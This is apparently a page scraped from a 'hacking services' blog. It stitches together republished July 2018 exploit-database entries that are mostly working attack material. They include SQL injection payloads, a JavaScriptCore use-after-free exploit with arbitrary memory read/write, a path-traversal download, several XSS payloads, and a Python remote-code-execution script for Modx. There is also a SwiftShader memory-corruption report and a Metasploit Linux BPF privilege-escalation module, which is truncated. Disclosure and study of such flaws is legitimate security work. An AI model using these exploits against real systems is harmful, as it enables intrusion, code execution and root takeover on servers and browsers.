# Exploit Title: Smart SMS & Email Manager v3.3 - SQL Injection
# Google Dork: N/A
# Date: 17.07.2018
# Exploit Author: Özkan Mustafa Akkuş (AkkuS)
# Vendor Homepage: https://codecanyon.net/item/smart-sms-email-manager-ssem/14817919
# Version: 3.3
# Tested on: Kali linux
====================================================
The vulnerability allows an attacker to inject sql commands
from the search section with 'contact_type_id' parameter in the admin panel.
# PoC : SQLi :
http://site.net/phonebook/contact_list_data
POST /phonebook/contact_list_data HTTP/1.1
Host: site.net
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101
Firefox/52.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://site.net/phonebook/contact_list
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 141
Cookie:
ci_session=a%3A4%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%22d61b9083afe2435321ba518449f3b108%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A14%3A%22213.14.165.138%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A68%3A%22Mozilla%2F5.0+%28X11%3B+Linux+x86_64%3B+rv%3A52.0%29+Gecko%2F20100101+Firefox%2F52.0%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1531824069%3B%7Dce4c26e8ee366999ae805f61eba75b1a;
xerone_dolphin=6811071531824070937
Connection: keep-alive
first_name=Test&last_name=test&phone_number=5555555&email=test%40test.com
&dob=07%2F04%2F2018&contact_type_id=280&is_searched=1&page=1&rows=10
Parameter: contact_type_id (POST)
Type: boolean-based blind
Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or
GROUP BY clause
Payload: client_username=tes&contact_type_id=142' RLIKE (SELECT (CASE
WHEN (5715=5715) THEN 142 ELSE 0x28 END)) AND 'Jeop' LIKE
'Jeop&permission_search=1&search_page=217722575636101&is_searched=1&page=1&rows=20
Type: error-based
Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP
BY clause (EXTRACTVALUE)
Payload: client_username=tes&contact_type_id=142' AND
EXTRACTVALUE(4506,CONCAT(0x5c,0x7176716271,(SELECT
(ELT(4506=4506,1))),0x7171707071)) AND 'vZFG' LIKE
'vZFG&permission_search=1&search_page=217722575636101&is_searched=1&page=1&rows=20
====================================================
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863572742
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
// Load Int library, thanks saelo!
load('util.js');
load('int64.js');
// Helpers to convert from float to in a few random places
var conva = new ArrayBuffer(8);
var convf = new Float64Array(conva);
var convi = new Uint32Array(conva);
var convi8 = new Uint8Array(conva);
var floatarr_magic = new Int64('0x3131313131313131').asDouble();
var floatarr_magic = new Int64('0x3131313131313131').asDouble();
var jsval_magic = new Int64('0x3232323232323232').asDouble();
var structs = [];
function log(x) {
print(x);
}
// Look OOB for array we can use with JSValues
function findArrayOOB(corrupted_arr, groom) {
log("Looking for JSValue array with OOB Float array");
for (let i = 0; i<corrupted_arr.length; i++) {
convf[0] = corrupted_arr[i];
// Find the magic value we stored in the JSValue Array
if (convi[0] == 0x10) {
convf[0] = corrupted_arr[i+1];
if (convi[0] != 0x32323232)
continue;
// Change the first element of the array
corrupted_arr[i+1] = new Int64('0x3131313131313131').asDouble();
let target = null;
// Find which array we modified
for (let j = 0; j<groom.length; j++) {
if (groom[j][0] != jsval_magic) {
target = groom[j];
break
}
}
log("Found target array for addrof/fakeobj");
// This object will hold our primitives
let prims = {};
let oob_ind = i+1;
// Get the address of a given jsobject
prims.addrof = function(x) {
// To do this we put the object in the jsvalue array and
// access it OOB with our float array
target[0] = x;
return Int64.fromDouble(corrupted_arr[oob_ind]);
}
// Return a jsobject at a given address
prims.fakeobj = function(addr) {
// To do this we overwrite the first slot of the jsvalue array
// with the OOB float array
corrupted_arr[oob_ind] = addr.asDouble();
return target[0];
}
return prims;
}
}
}
// Here we will spray structure IDs for Float64Arrays
// See http://www.phrack.org/papers/attacking_javascript_engines.html
function sprayStructures() {
function randomString() {
return Math.random().toString(36).replace(/[^a-z]+/g, '').substr(0, 5);
}
// Spray arrays for structure id
for (let i = 0; i < 0x1000; i++) {
let a = new Float64Array(1);
// Add a new property to create a new Structure instance.
a[randomString()] = 1337;
structs.push(a);
}
}
// Here we will create our fake typed array and get arbitrary read/write
// See http://www.phrack.org/papers/attacking_javascript_engines.html
function getArb(prims) {
sprayStructures()
let utarget = new Uint8Array(0x10000);
utarget[0] = 0x41;
// Our fake array
// Structure id guess is 0x200
// [ Indexing type = 0 ][ m_type = 0x27 (float array) ][ m_flags = 0x18 (OverridesGetOwnPropertySlot) ][ m_cellState = 1 (NewWhite)]
let jscell = new Int64('0x0118270000000200');
// Construct the object
// Each attribute will set 8 bytes of the fake object inline
obj = {
'a': jscell.asDouble(),
// Butterfly can be anything
'b': false,
// Target we want to write to
'c': utarget,
// Length and flags
'd': new Int64('0x0001000000000010').asDouble()
};
// Get the address of the values we stored in obj
let objAddr = prims.addrof(obj).add(16);
log("Obj addr + 16 = "+objAddr);
// Create a fake object from this pointer
let fakearray = prims.fakeobj(objAddr);
// Attempt to find a valid ID for our fake object
while(!(fakearray instanceof Float64Array)) {
jscell.add(1);
obj['a'] = jscell.asDouble();
}
log("Matched structure id!");
// Set data at a given address
prims.set = function(addr, arr) {
fakearray[2] = addr.asDouble();
utarget.set(arr);
}
// Read 8 bytes as an Int64 at a given address
prims.read64 = function(addr) {
fakearray[2] = addr.asDouble();
let bytes = Array(8);
for (let i=0; i<8; i++) {
bytes[i] = utarget[i];
}
return new Int64(bytes);
}
// Write an Int64 as 8 bytes at a given address
prims.write64 = function(addr, value) {
fakearray[2] = addr.asDouble();
utarget.set(value.bytes);
}
}
// Here we will use build primitives to eventually overwrite the JIT page
function exploit(corrupted_arr, groom) {
save.push(groom);
save.push(corrupted_arr);
// Create fakeobj and addrof primitives
let prims = findArrayOOB(corrupted_arr, groom);
// Upgrade to arb read/write from OOB read/write
getArb(prims);
// Build an arbitrary JIT function
// This was basically just random junk to make the JIT function larger
let jit = function(x) {
var j = []; j[0] = 0x6323634;
return x*5 + x - x*x /0x2342513426 +(x - x+0x85720642 *(x +3 -x / x+0x41424344)/0x41424344)+j[0]; };
// Make sure the JIT function has been compiled
jit();
jit();
jit();
// Traverse the JSFunction object to retrieve a non-poisoned pointer
log("Finding jitpage");
let jitaddr = prims.read64(
prims.read64(
prims.read64(
prims.read64(
prims.addrof(jit).add(3*8)
).add(3*8)
).add(3*8)
).add(5*8)
);
log("Jit page addr = "+jitaddr);
// Overwrite the JIT code with our INT3s
log("Writting shellcode over jit page");
prims.set(jitaddr.add(32), [0xcc, 0xcc, 0xcc, 0xcc]);
// Call the JIT function, triggering our INT3s
log("Calling jit function");
jit();
throw("JIT returned");
}
// Find and set the length of a non-freed butterfly with our unstable OOB primitive
function setLen(uaf_arr, ind) {
let f=0;
for (let i=0; i<uaf_arr.length; i++) {
convf[0] = uaf_arr[i];
// Look for a new float array, and set the length
if (convi[0] == 0x10) {
convf[0] = uaf_arr[i+1];
if (convi[0] == 0x32323232 && convi[1] == 0x32323232) {
convi[0] = 0x42424242;
convi[1] = 0x42424242;
uaf_arr[i] = convf[0];
return;
}
}
}
throw("Could not find anouther array to corrupt");
}
let oob_rw_unstable = null;
let oob_rw_unstable_ind = null;
let oob_rw_stable = null;
// After this point we would stop seeing GCs happen enough to race :(
const limit = 10;
const butterfly_size = 32
let save = [0, 0]
for(let at = 0; at < limit; at++) {
log("Trying to race GC and array.reverse() Attempt #"+(at+1));
// Allocate the initial victim and target arrays
let victim_arrays = new Array(2048);
let groom = new Array(2048);
for (let i=0; i<victim_arrays.length; i++) {
victim_arrays[i] = new Array(butterfly_size).fill(floatarr_magic)
groom[i] = new Array(butterfly_size/2).fill(jsval_magic)
}
let vv = [];
let v = []
// Allocate large strings to trigger the GC while calling reverse
for (let i = 0; i < 506; i++) {
for(let j = 0; j < 0x100; j++) {
// Cause GCs to trigger while we are racing with reverse
if (j == 0x44) { v.push(new String("B").repeat(0x10000*save.length/2)) }
victim_arrays.reverse()
}
}
for (let i = 0; i < victim_arrays.length; i++) {
// Once we see we have replaced a free'd butterfly
// fill the replacing array with 0x41414141... to smash rest
// of UAF'ed butterflies
// We know the size will be 506, because it will have been replaced with v
// we were pushing into in the loop above
if(victim_arrays[i].length == 506) {
victim_arrays[i].fill(2261634.5098039214)
}
// Find the first butterfly we have smashed
// this will be an unstable OOB r/w
if(victim_arrays[i].length == 0x41414141) {
oob_rw_unstable = victim_arrays[i];
oob_rw_unstable_ind = i;
break;
}
}
// If we successfully found a smashed and still freed butterfly
// use it to corrupt a non-freed butterfly for stability
if(oob_rw_unstable) {
setLen(oob_rw_unstable, oob_rw_unstable_ind)
for (let i = 0; i < groom.length; i++) {
// Find which array we just corrupted
if(groom[i].length == 0x42424242) {
oob_rw_stable = groom[i];
break;
}
}
if (!oob_rw_stable) {
throw("Groom seems to have failed :(");
}
}
// chew CPU to avoid a segfault and help with gc schedule
for (let i = 0; i < 0x100000; i++) { }
// Attempt to clean up some
let f = []
for (let i = 0; i < 0x2000; i++) {
f.push(new Array(16).fill(2261634.6098039214))
}
save.push(victim_arrays)
save.push(v)
save.push(f)
save.push(groom)
if (oob_rw_stable) {
log("Found stable corrupted butterfly! Now the fun begins...");
exploit(oob_rw_stable, groom);
break;
}
}
throw("Failed to find any UAF'ed butterflies");
# Exploit Title: FTP2FTP 1.0 - Arbitrary File Download
# Dork: N/A
# Date: 18.07.2018
# Exploit Author: Özkan Mustafa Akkuş (AkkuS)
# Vendor Homepage: https://codecanyon.net/item/ftp2ftp-server-to-server-file-transfer-php-script/21972395
# Version: 1.0
# Category: Webapps
# Tested on: Kali linux
# Description : The "download2.php" is vulnerable in the admin panel.
The attacker can download and read all files known by the name via 'id' parameter.
====================================================
# Vuln file : /FTP2FTP/download2.php
1. <?php
2. $file = "tempFiles2/".$_GET['id'];
3.
4.
5. if (file_exists($file)) {
6. header('Content-Description: File Transfer');
7. header('Content-Type: application/octet-stream');
8. header('Content-Disposition: attachment; filename="'.basename($file).'"');
9. header('Expires: 0');
10. header('Cache-Control: must-revalidate');
11. header('Pragma: public');
12. header('Content-Length: ' . filesize($file));
13. readfile($file);
14. exit;
15. }
16. ?>
# PoC : http://sitenet/FTP2FTP/download2.php?id=../index.php
#######################################
# Exploit Title: Open-AudIT Community - 2.1.1 - Cross Site Scripting Vulnerability
# Google Dork:NA
# #######################################
# Exploit Author: Ranjeet Jaiswal#
#######################################
# Vendor Homepage: https://opmantek.com/
# Software Link:http://dl-openaudit.opmantek.com/OAE-Win-x86_64-
release_2.2.1.exe
# Affected Version: 2.1.1
# Category: WebApps
# Tested on: Windows 10
# CVE : CVE-2018-11124
#
# 1. Vendor Description:
#
# Network Discovery and Inventory Software | Open-AudIT | Opmantek
Discover what's on your network
Open-AudIT is the world's leading network discovery, inventory and audit
program. Used by over 10,000 customers.
#
# 2. Technical Description:
#
# Cross-site scripting (XSS) vulnerability in Attributes functionality in
Open-AudIT Community edition before 2.2.2 allows remote attackers to inject
arbitrary web script or HTML via a crafted attribute name of a Attribute,
as demonstrated in below POC.
#
# 3. Proof Of Concept:
3.1. Proof of Concept for Injecting html contain
# #Step to reproduce.
Step1:Login in to Open-Audit
Step2:Go to Attributes page
Step3:Select any attribute which are listed
Step4:click on details tab.
Step5:In the Name field put the following payload and click submit.
<p>Sorry! We have moved! The new URL is: <a href="http://geektyper.com/">
Open-Audit</a></p>
Step6:Go to export tab and export using HTML Table
Step7:When user open download attribute.html file.You will see redirection
hyperlink.
Step8:When user click on link ,User will be redirected to Attacker or
malicious website.
3.2. Proof of Concept for Injecting web script(Cross-site scripting(XSS))
# #Step to reproduce.
Step1:Login in to Open-Audit
Step2:Go to Attributes page
Step3:Select any attribute which are listed
Step4:click on details tab.
Step5:In the Name field put the following payload and click submit.
<script>alert(hack)</script>
Step6:Go to export tab and export using HTML Table
Step7:When user open download attribute.html file.Alert Popup will execute.
# 4. Solution:
#
# Upgrade to latest release of Open-AudIT version
# https://opmantek.com/network-tools-download/open-audit/
# Exploit Title: Modx Revolution < 2.6.4 - Remote Code Execution
# Date: 2018-07-13
# Exploit Author: Vitalii Rudnykh
# Vendor Homepage: https://modx.com/
# Version: <= 2.6.4
# CVE : CVE-2018-1000207
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import sys
import os
import requests
from colorama import init, Fore, Style
try:
init()
def cls():
os.system('cls' if os.name == 'nt' else 'clear')
cls()
print(Fore.BLUE +
'################################################################')
print(Fore.CYAN +
'# Proof-Of-Concept for CVE-2018-1000207 (Modx Revolution)')
print('# by Vitalii Rudnykh')
print('# Thanks by AgelNash')
print('# https://github.com/a2u/CVE-2018-1000207/')
print(Fore.BLUE +
'################################################################')
print('Provided only for educational or information purposes')
print(Style.RESET_ALL)
target = input('Enter target url (example: http(s)://domain.tld/): ')
verify = True
code = '<?php echo md5(\'a2u\'); unlink($_SERVER[\'SCRIPT_FILENAME\']);?>'
if requests.get(
target + '/connectors/system/phpthumb.php',
verify=verify).status_code != 404:
print(Fore.GREEN + '/connectors/system/phpthumb.php - found')
url = target + '/connectors/system/phpthumb.php'
payload = {
'ctx': 'web',
'cache_filename': '../../payload.php',
'useRawIMoutput': '1',
'src': '.',
'IMresizedData': code,
'config_prefer_imagemagick': '0'
}
r = requests.post(url, data=payload, verify=verify)
check = requests.get(target + 'payload.php', verify=verify)
if check.text == '9bdc11de19fd93975bf9c9ec3dd7292d':
print(Fore.GREEN + 'Exploitable!\n')
else:
print(Fore.RED + 'Not exploitable!\n')
else:
print(Fore.RED + 'phpthumb.php - not found')
if requests.get(
target + '/assets/components/gallery/connector.php',
verify=verify).status_code != 404:
print(Fore.GREEN + '/assets/components/gallery/connector.php - found')
url = target + '/assets/components/gallery/connector.php'
payload = {
'action': 'web/phpthumb',
'f': 'php',
'useRawIMoutput': '1',
'IMresizedData': 'Ok',
'config_prefer_imagemagick': '0'
}
r = requests.post(url, data=payload, verify=verify)
if r.text == 'Ok':
print(Fore.GREEN + 'Exploitable!\n')
else:
print(Fore.RED + 'Not exploitable!\n')
else:
print(
Fore.RED + '/assets/components/gallery/connector.php - not found')
except KeyboardInterrupt:
cls()
# Exploit Title: MyBB New Threads Plugin - Cross-Site Scripting
# Date: 7/16/2018
# Author: 0xB9
# Twitter: @0xB9Sec
# Contact: 0xB9[at]pm.me
# Software Link: https://community.mybb.com/mods.php?action=view&pid=1143
# Version: 1.1
# Tested on: Ubuntu 18.04
# CVE: CVE-2018-14392
1. Description:
New Threads is a plugin that displays new threads on the index page. The thread titles allow XSS.
2. Proof of Concept:
- Create a new thread with the following subject <script>alert('XSS')</script>
- Visit the index page to see alert.
3. Solution:
Update to 1.2
# Exploit Title: WordPress Plugin All In One Favicon <= 4.6 - Authenticated Multiple XSS Persistent
# Date: 2018-07-10
# Exploit Author: Javier Olmedo
# Website: https://hackpuntes.com/
# Vendor Homepage: http://www.techotronic.de/
# Software Link: https://wordpress.org/plugins/all-in-one-favicon/
# Version/s: 4.6 and below
# Patched Version: unpatched
# CVE : 2018-13832
# WPVULNDB: https://wpvulndb.com/vulnerabilities/9099
Plugin description:
All In One Favicon adds favicons to your site and your admin pages. You can either use favicons you already uploaded or use the builtin upload mechanism to upload a favicon to your WordPress installation.
Description:
WordPress Plugin All In One Favicon before 4.6 allows remote authenticated users to execute javascript code through XSS Persistent attacks.
Technical details:
The following parameters are vulnerable:
backendApple-Text
backendICO-Text
backendPNG-Text
backendGIF-Text
frontendApple-Text
frontendICO-Text
frontendPNG-Text
frontendGIF-Text
Proof of Concept (PoC):
The following POST request will cause it to display an alert in the browser when it runs as an authenticated user with permissions:
POST /wordpress/wp-admin/admin-post.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:61.0) Gecko/20100101 Firefox/61.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://localhost/wordpress/wp-admin/options-general.php?page=all-in-one-favicon%2Fall-in-one-favicon.php
Content-Type: multipart/form-data; boundary=---------------------------168911549614148
Content-Length: 3407
Connection: close
Upgrade-Insecure-Requests: 1
-----------------------------168911549614148
Content-Disposition: form-data; name="_wpnonce"
9df031414d
-----------------------------168911549614148
Content-Disposition: form-data; name="_wp_http_referer"
/wordpress/wp-admin/options-general.php?page=all-in-one-favicon%2Fall-in-one-favicon.php
-----------------------------168911549614148
Content-Disposition: form-data; name="option_page"
aio-favicon_settings
-----------------------------168911549614148
Content-Disposition: form-data; name="aio-favicon_settings[frontendICO-text]"
"><img src=a onerror=alert(1)>
-----------------------------168911549614148
Content-Disposition: form-data; name="action"
aioFaviconUpdateSettings
-----------------------------168911549614148
Content-Disposition: form-data; name="aioFaviconUpdateSettings"
Guardar cambios
-----------------------------168911549614148
Content-Disposition: form-data; name="action"
aioFaviconUpdateSettings
-----------------------------168911549614148
Content-Disposition: form-data; name="aio-favicon_settings[removeLinkFromMetaBox]"
true
-----------------------------168911549614148
Content-Disposition: form-data; name="action"
aioFaviconUpdateSettings
-----------------------------168911549614148--
Payloads:
"><img src=a onerror=alert(1)>
"><img src=a onerror=alert(String.fromCharCode(88,83,83))>
Timeline:
15/03/2018 I send the report. (no answer)
27/05/2018 I send the report, again. (no answer)
10/07/2018 Public disclosure.
References:
https://hackpuntes.com/cve-2018-13832-wordpress-plugin-all-in-one-favicon-4-6-autenticado-multiples-cross-site-scripting-persistentes/
There's a remotely triggerable memory corruption issue in SwiftShader that's reachable from WebGL, resulting from an integer overflow issue.
In the GPU process there is validation on the sizes passed to texture creation functions to ensure that they shouldn't cause overflow. However, in the Swiftshader code there is a separate rounding up of render-target sizes to the next even size, which allows bypassing this validation.
(Note the additional +4, which is also (unexpected by the chrome gpu process) unsafe but in practice shouldn't cause an issue.)
https://cs.chromium.org/chromium/src/third_party/swiftshader/src/Renderer/Surface.cpp?l=3261
void *Surface::allocateBuffer(int width, int height, int depth, int border, int samples, Format format)
{
// Render targets require 2x2 quads
int width2 = (width + 1) & ~1;
int height2 = (height + 1) & ~1;
// FIXME: Unpacking byte4 to short4 in the sampler currently involves reading 8 bytes,
// and stencil operations also read 8 bytes per four 8-bit stencil values,
// so we have to allocate 4 extra bytes to avoid buffer overruns.
return allocate(size(width2, height2, depth, border, samples, format) + 4);
}
Size calculation takes place here:
https://cs.chromium.org/chromium/src/third_party/swiftshader/src/Renderer/Surface.cpp?l=2646
unsigned int Surface::size(int width, int height, int depth, int border, int samples, Format format)
{
width += 2 * border;
height += 2 * border;
// Dimensions rounded up to multiples of 4, used for compressed formats
int width4 = align(width, 4);
int height4 = align(height, 4);
switch(format)
{
// ... snip ...
default:
return bytes(format) * width * height * depth * samples;
}
}
The maximum value for bytes(format) is 16, with something like GL_RGBA32F, and samples is 1.
We can't cause this value to overflow if we have to provide the texture contents, since allocating a sufficiently large Float32Array will be larger than the renderer memory limits, but we can use glTexStorage3D to trigger the overflow.
We need to meet the following conditions:
1 <= width <= 0x2000
1 <= height <= 0x2000
1 <= depth <= 0x2000
16 * width * height * depth <= 0x100000000ull;
If these conditions are met, and we can also produce values such that:
16 * ((width + 1) & ~1) * ((height + 1) & ~1) * depth >= 0x100000000ull;
Then we'll get an integer overflow during size calculation, and end up with a small buffer for a large texture.
If we use the path glTexSubImage3D to initialize the texture, this will zero out (Chrome's expected size) of the texture (~4gig) in the (260 byte) allocation, which may make exploitation awkward, but especially in a context like the GPU process with multiple threads interacting, it's likely possible to exploit this issue. There may also be alternative paths which avoid the wild memset, but I'm reporting now so that work on a fix can start.
Note, it is possible for an attacker to force use of the Swiftshader backend for WebGL rendering by simply crashing the GPU process a few times (for a platform dependent value of 'few'). The attached PoC uses 4 domains and cycles between them to trigger 3 (hardware accelerated) GPU process crashes due to OOM (on my workstation, at least) which will then be followed by the (software accelerated) GPU process hitting this bug. Mileage may vary with different GPU drivers/OpenGL implementations.
Crashes with the PoC will be fairly random - whatever you'd expect for zeroing out your entire heap...
Thread 1 "chrome" received signal SIGSEGV, Segmentation fault.
0x00007fe697e94551 in egl::Image::loadImageData(egl::Context*, int, int, int, int, int, int, unsigned int, unsigned int, egl::Image::UnpackInfo const&, void const*) ()
from src/out/non-asan/swiftshader/libGLESv2.so
(gdb) bt
#0 0x00007fe697e94551 in egl::Image::loadImageData(egl::Context*, int, int, int, int, int, int, unsigned int, unsigned int, egl::Image::UnpackInfo const&, void const*) ()
at src/out/non-asan/swiftshader/libGLESv2.so
#1 0x0000000000000000 in ()
(gdb) x/10i $pc
=> 0x7fe697e94551 <_ZN3egl5Image13loadImageDataEPNS_7ContextEiiiiiijjRKNS0_10UnpackInfoEPKv+9911>: jmpq *0x28(%rax)
0x7fe697e94554 <_ZN12_GLOBAL__N_113LoadImageDataILNS_8DataTypeE1EEEviiiiiiiiiiPKvPv>: push %rbp
0x7fe697e94555 <_ZN12_GLOBAL__N_113LoadImageDataILNS_8DataTypeE1EEEviiiiiiiiiiPKvPv+1>: push %r15
0x7fe697e94557 <_ZN12_GLOBAL__N_113LoadImageDataILNS_8DataTypeE1EEEviiiiiiiiiiPKvPv+3>: push %r14
0x7fe697e94559 <_ZN12_GLOBAL__N_113LoadImageDataILNS_8DataTypeE1EEEviiiiiiiiiiPKvPv+5>: push %r13
0x7fe697e9455b <_ZN12_GLOBAL__N_113LoadImageDataILNS_8DataTypeE1EEEviiiiiiiiiiPKvPv+7>: push %r12
0x7fe697e9455d <_ZN12_GLOBAL__N_113LoadImageDataILNS_8DataTypeE1EEEviiiiiiiiiiPKvPv+9>: push %rbx
0x7fe697e9455e <_ZN12_GLOBAL__N_113LoadImageDataILNS_8DataTypeE1EEEviiiiiiiiiiPKvPv+10>: sub $0x48,%rsp
0x7fe697e94562 <_ZN12_GLOBAL__N_113LoadImageDataILNS_8DataTypeE1EEEviiiiiiiiiiPKvPv+14>: mov %r8d,0xc(%rsp)
0x7fe697e94567 <_ZN12_GLOBAL__N_113LoadImageDataILNS_8DataTypeE1EEEviiiiiiiiiiPKvPv+19>: test %r9d,%r9d
(gdb) i r
rax 0x0 0
rbx 0x8814 34836
rcx 0x1 1
rdx 0x10 16
rsi 0x30b20f90860 3346332715104
rdi 0x30b2081f500 3346324911360
rbp 0x1406 0x1406
rsp 0x7ffdafd862c8 0x7ffdafd862c8
r8 0xfffffffffffffff0 -16
r9 0x1 1
r10 0x75 117
r11 0x30b2088ee90 3346325368464
r12 0xc2 194
r13 0x2a3 675
r14 0x8814 34836
r15 0x0 0
rip 0x7fe697e94551 0x7fe697e94551 <egl::Image::loadImageData(egl::Context*, int, int, int, int, int, int, unsigned int, unsigned int, egl::Image::UnpackInfo const&, void const*)+9911>
eflags 0x10202 [ IF RF ]
cs 0x33 51
ss 0x2b 43
ds 0x0 0
es 0x0 0
fs 0x0 0
gs 0x0 0
(gdb)
See crash-id d0573792cf03341d for a crash on the current stable branch.
To test using the attached PoC, either run chrome with --disable-gpu to force software rendering, or create 4 aliases to localhost evil0.com, evil1.com, evil2.com and evil3.com in your /etc/hosts file and run ./server.py <port_number> and point your browser to evil0.com:<port_number>.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/45059.zip
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Local
Rank = GreatRanking
include Msf::Post::Linux::Priv
include Msf::Post::Linux::System
include Msf::Post::Linux::Kernel
include Msf::Post::File
include Msf::Exploit::EXE
include Msf::Exploit::FileDropper
def initialize(info = {})
super(update_info(info,
'Name' => 'Linux BPF Sign Extension Local Privilege Escalation',
'Description' => %q{
Linux kernel prior to 4.14.8 utilizes the Berkeley Packet Filter (BPF)
which contains a vulnerability where it may improperly perform sign
extension. This can be utilized to escalate privileges.
The target system must be compiled with BPF support and must not have
kernel.unprivileged_bpf_disabled set to 1.
This module has been tested successfully on:
Debian 9.0 kernel 4.9.0-3-amd64;
Deepin 15.5 kernel 4.9.0-deepin13-amd64;
ElementaryOS 0.4.1 kernel 4.8.0-52-generic;
Fedora 25 kernel 4.8.6-300.fc25.x86_64;
Fedora 26 kernel 4.11.8-300.fc26.x86_64;
Fedora 27 kernel 4.13.9-300.fc27.x86_64;
Gentoo 2.2 kernel 4.5.2-aufs-r;
Linux Mint 17.3 kernel 4.4.0-89-generic;
Linux Mint 18.0 kernel 4.8.0-58-generic;
Linux Mint 18.3 kernel 4.13.0-16-generic;
Mageia 6 kernel 4.9.35-desktop-1.mga6;
Manjero 16.10 kernel 4.4.28-2-MANJARO;
Solus 3 kernel 4.12.7-11.current;
Ubuntu 14.04.1 kernel 4.4.0-89-generic;
Ubuntu 16.04.2 kernel 4.8.0-45-generic;
Ubuntu 16.04.3 kernel 4.10.0-28-generic;
Ubuntu 17.04 kernel 4.10.0-19-generic;
ZorinOS 12.1 kernel 4.8.0-39-generic.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Jann Horn', # Discovery
'bleidl', # Discovery and get-rekt-linux-hardened.c exploit
'vnik', # upstream44.c exploit
'rlarabee', # cve-2017-16995.c exploit
'h00die', # Metasploit
'bcoles' # Metasploit
],
'DisclosureDate' => 'Nov 12 2017',
'Platform' => [ 'linux' ],
'Arch' => [ ARCH_X86, ARCH_X64 ],
'SessionTypes' => [ 'shell', 'meterpreter' ],
'Targets' => [[ 'Auto', {} ]],
'Privileged' => true,
'References' =>
[
[ 'AKA', 'get-rekt-linux-hardened.c' ],
[ 'AKA', 'upstream44.c' ],
[ 'BID', '102288' ],
[ 'CVE', '2017-16995' ],
[ 'EDB', '44298' ],
[ 'EDB', '45010' ],
[ 'URL', 'https://github.com/rlarabee/exploits/blob/master/cve-2017-16995/cve-2017-16995.c' ],
[ 'URL', 'https://github.com/brl/grlh/blob/master/get-rekt-linux-hardened.c' ],
[ 'URL', 'http://cyseclabs.com/pub/upstream44.c' ],
[ 'URL', 'https://blog.aquasec.com/ebpf-vulnerability-cve-2017-16995-when-the-doorman-becomes-the-backdoor' ],
[ 'URL', 'https://ricklarabee.blogspot.com/2018/07/ebpf-and-analysis-of-get-rekt-linux.html' ],
[ 'URL', 'https://www.debian.org/security/2017/dsa-4073' ],
[ 'URL', 'https://usn.ubuntu.com/3523-2/' ],
[ 'URL', 'https://people.canonical.com/~ubuntu-security/cve/2017/CVE-2017-16995.html' ],
[ 'URL', 'https://bugs.chromium.org/p/project-zero/issues/detail?id=1454' ],
[ 'URL', 'http://openwall.com/lists/oss-security/2017/12/21/2'],
[ 'URL', 'https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=95a762e2c8c942780948091f8f2a4f32fce1ac6f' ]
],
'DefaultTarget' => 0))
register_options [
OptEnum.new('COMPILE', [ true, 'Compile on target', 'Auto', %w[Auto True False] ]),
OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ])
]
end
def base_dir
datastore['WritableDir'].to_s
end
def upload(path, data)
print_status "Writing '#{path}' (#{data.size} bytes) ..."
rm_f path
write_file path, data
end
def upload_and_chmodx(path, data)
upload path, data
cmd_exec "chmod +x '#{path}'"
end
def upload_and_compile(path, data)
upload "#{path}.c", data
gcc_cmd = "gcc -o #{path} #{path}.c"
if session.type.eql? 'shell'
gcc_cmd = "PATH=$PATH:/usr/bin/ #{gcc_cmd}"
end
output = cmd_exec gcc_cmd
rm_f "#{path}.c"
unless output.blank?
print_error output
fail_with Failure::Unknown, "#{path}.c failed to compile. Set COMPILE False to upload a pre-compiled executable."
end
cmd_exec "chmod +x #{path}"
end
def exploit_data(file)
path = ::File.join Msf::Config.data_directory, 'exploits', 'cve-2017-16995', file
fd = ::File.open path, 'rb'
data = fd.read fd.stat.size
fd.close
data
end
def live_compile?
return false unless datastore['COMPILE'].eql?('Auto') || datastore['COMPILE'].eql?('True')
if has_gcc?
vprint_good 'gcc is installed'
return true
end
unless datastore['COMPILE'].eql? 'Auto'
fail_with Failure::BadConfig, 'gcc is not installed. Compiling will fail.'
end
end
def check
arch = kernel_hardware
unless arch.include? 'x86_64'
vprint_error "System architecture #{arch} is not supported"
return CheckCode::Safe
end
vprint_good "System architecture #{arch} is supported"
if unprivileged_bpf_disabled?
vprint_error 'Unprivileged BPF loading is not permitted'
return CheckCode::Safe
end
vprint_good 'Unprivileged BPF loading is permitted'
release = kernel_release
if Gem::Version.new(release.split('-').first) > Gem::Version.new('4.14.11') ||
Gem::Version.new(release.split('-').first) < Gem::Version.new('4.0')
vprint_error "Kernel version #{release} is not vulnerable"
return CheckCode::Safe
end
vprint_good "Kernel version #{release} appears to be vulnerable"
CheckCode::Appears
end
def exploit
unless check == CheckCode::Appears
fail_with Failure::NotVulnerable, 'Target not vulnerable! punt!'
end
if is_root?
fail_with Failure::BadConfig, 'Session already has root privileges'
end
unless cmd_exec("test -w '#{base_dir}' && echo true").include? 'true'
fail_with Failure::BadConfig, "#{base_dir} is not writable"
end
# Upload exploit executable
executable_name = ".#{rand_text_alphanumeric rand(5..10)}"
executable_path = "#{base_dir}/#{executable_name}"
if live_compile?
vprint_status 'Live compiling exploit on system...'
upload_and_compile executable_path, exploit_data('exploit.c')
else
